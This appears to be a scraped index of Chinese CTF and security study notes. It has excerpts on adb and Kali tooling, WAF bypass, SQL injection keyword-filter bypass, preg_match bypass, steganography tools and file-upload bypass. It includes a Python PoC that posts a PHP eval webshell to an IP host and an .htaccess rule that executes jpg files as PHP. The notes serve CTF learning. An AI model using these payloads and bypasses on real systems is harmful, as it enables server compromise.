Acm辅助解题系统帮助文档
等待更新。。。。。。。。。。。
2,17
无题
AI
adb使用命令
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950卸载软件adb uninstall <软件名>adb uninstall -k <软件名>如果加 -k参数, 为卸载软件 但是保留配置和缓存文件开启adb服务adb start-server关闭adb服务,杀掉进程adb kill-server连接设备adb connect 设备ip(如:192.168.1.61)如果是USB连接,直接会连接ADB,如果是想通过网络连接(有线或者无线),则需要在同一个局域网,通过IP连接。上面192.168.1.61替换成想要连接设备的IP即可断开设备adb disconnect 设备ip(如:192.168.1.61)清除应用数据与缓存adb shell pm clear (apk包名)获取文件的读写权限adb remount有些设备并不能直接adb remount,必须要先以root身份进入,先执行adb root,在执行adb remount ...
RCE-WAF绕过
RCE-WAF绕过WAF绕过的目标是绕过WAF的规则和过滤器,使攻击可以成功地通过WAF并达到预期的攻击效果。以下是一些常见的WAF绕过技术:
编码绕过:通过对攻击负载进行编码或混淆,以绕过WAF的特征匹配。例如,使用URL编码、Unicode编码、Base64编码等对攻击载荷进行编码,以使其在WAF检测时无法被正确识别。
分割绕过:将攻击负载拆分为多个部分,以绕过WAF的完整性检查。例如,将SQL注入语句的关键字拆分为多个部分,或将恶意代码分散在多个HTTP请求中,以避免被WAF完全检测到。
混合绕过:结合多个绕过技术,以增加绕过成功的可能性。例如,将编码和分割技术结合使用,同时使用多个编码方式对攻击负载进行混淆。
特殊字符绕过:利用一些特殊字符或Unicode字符的变形来绕过WAF的规则。例如,使用不同大小写的字符、宽字符、特殊字符的变形等。
HTTP方法绕过:尝试使用非标准的HTTP方法来绕过WAF的规则。例如,使用PROPFIND、OPTIONS等非常见的HTTP方法进行攻击。
隧道绕过:通过将攻击负载封装在其他协议或通信通道中,以绕过WAF的检测。例如,使用HTTP隧道技术 ...
pngcheck使用命令
pngcheck使用命令在Kali Linux上,您可以使用pngcheck工具来测试和检查PNG图像文件的完整性,并打印出大小和类型信息。
下面是pngcheck工具的使用方法和对应的命令效果:
12345678910111213141516171819202122231. 检查单个PNG文件: `pngcheck <文件路径>` 该命令将测试并检查指定的PNG文件,并打印出与文件相关的信息、错误和警告。2. 检查多个PNG文件: `pngcheck <文件1路径> <文件2路径> ...` 您可以指定多个PNG文件的路径,pngcheck将依次测试并检查它们,并打印出相应的信息。3. 批量检查文件夹中的PNG文件: `find <文件夹路径> -name "*.png" -exec pngcheck {} \;` 使用该命令,您可以批量检查指定文件夹中的所有PNG文件,并打印出相应的信息。4. 静默测试(仅输出错误): `pngcheck -q <文件路径> ...
SQL注入做题经验
SQL注入做题经验1,[极客大挑战 2019]BabySQL
特点:这个题目过滤了过滤了好多关键字,比如or, select,where, union。应该是用函数replace给我们替换成了空白字符
解决:构造oorr,sselectelect,类似的词语绕过过滤。
双写绕过,编码绕过(#:%23)
在某些情况下,系统可能会对用户输入进行一些过滤或验证来防止恶意输入或攻击。其中一种常见的过滤方式是对特定字符进行转义或URL编码。
在你提供的例子中,输入的字符 “#” 被转义为 “%23”。这样做的好处是可以绕过一些简单的过滤机制,因为对于这些过滤机制来说,”%23” 不会被解析为 “#” 字符。
对于一些简单的应用程序,开发者可能只检查是否存在 “union” 和 “select” 这样的关键词,而忽略了其他特殊字符。通过使用转义字符或URL编码,攻击者可以欺骗这些简单的过滤机制,绕过它们的检查。
然而,这并不是一种可靠的方式来进行攻击,因为更强大的过滤和安全策略可以检测和阻止这种类型的注入攻击。更重要的是,使用转义字符或URL编码来绕过过滤机制是不被推荐的,因为它并不安全,并且可能 ...
preg_match 函数绕过
preg_match绕过总结函数简介:
123returns 1; // 如果匹配到. returns 0; // 如果未匹配到. returns FALSE; // 发生错误时.
绕过方法:
1,数组绕过原理:
preg_match只能处理字符串,当传入的subject是数组时会返回false
2,PHP利用PCRE回溯流量限制绕过某些安全限制123456789import requestsfrom io import BytesIOfiles = { 'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000)}res = requests.post('http://51.158.75.42:8088/index.php', files=files, allow_redirects=False)print(res.headers)
Payload:?a=ssss………..省略n个字符,突 ...
zsteg使用命令
zsteg使用命令zsteg可以检测PNG和BMP图片里的隐写数据。
目前,zsteg支持检测:
LSB steganography in PNG & BMP
zlib-compressed data
OpenStego
Camouflage 1.2.1
LSB with The Eratosthenes set
12345678910111213141516zsteg <image_path>: 分析图像并尝试提取隐藏在图像中的数据,并将成功提取的数据显示在终端上。尝试所有已知的组合zsteg -a <image_path>: 使用所有的隐写方法尝试提取数据。zsteg -E <extension> <image_path>: 使用指定扩展名的文件存储提取的数据。zsteg -e <method> <image_path>: 使用特定的隐写方法提取数据。zsteg -f <image_path>: 列出图像中包含的文件。zsteg -h: 显示 zsteg 的帮助信息。zsteg -i & ...
文件上传绕过
文件上传绕过1,后缀.htaccess文件是Apache服务中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮助我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录的访问,禁止目录列表,配置默认文档等功能
.htaccess文件内容:SetHandler application/x-httpd-php的意思是设置当前目录所有文件都使用php解析,那么无论上传任何文件,只要符合php语言代码规范,就会被当做PHP执行。不符合规则则报错
这里随便访问一个不存在的页面造成Not Found报错,就可以看到服务器信息:
123456<FilesMatch "jpg"> SetHandler application/x-httpd-php</FilesMatch>
表示将jpg文件解析为php文件
wsl2-kali使用命令
wsl2-kali使用命令wsl2
12PS C:\Users\Liuzi> wsl --shutdown #关机PS C:\Users\Liuzi> wsl --list --verbose # 查看已安装的系统
kali-kex
123456789# 启动cd ~kex# 关闭kex stop# 窗口模式kex --win -s# 无缝模式kex --sl -s
在WSL 2上运行的Kali Linux是通过Windows的WSL子系统来管理的,因此你可以使用WSL子系统的命令来重启Kali Linux。以下是重启Kali Linux的步骤:
打开命令提示符或PowerShell。
运行以下命令来列出当前正在运行的WSL子系统:
1wsl --list
这将显示已安装的WSL子系统的列表,包括Kali Linux。
根据你的Kali Linux子系统的名称,运行以下命令来关闭该子系统:
1wsl --terminate <Kali Linux 子系统名称>
例如,如果你的Kali Linux子系统名称是kali-linux,则运行:
...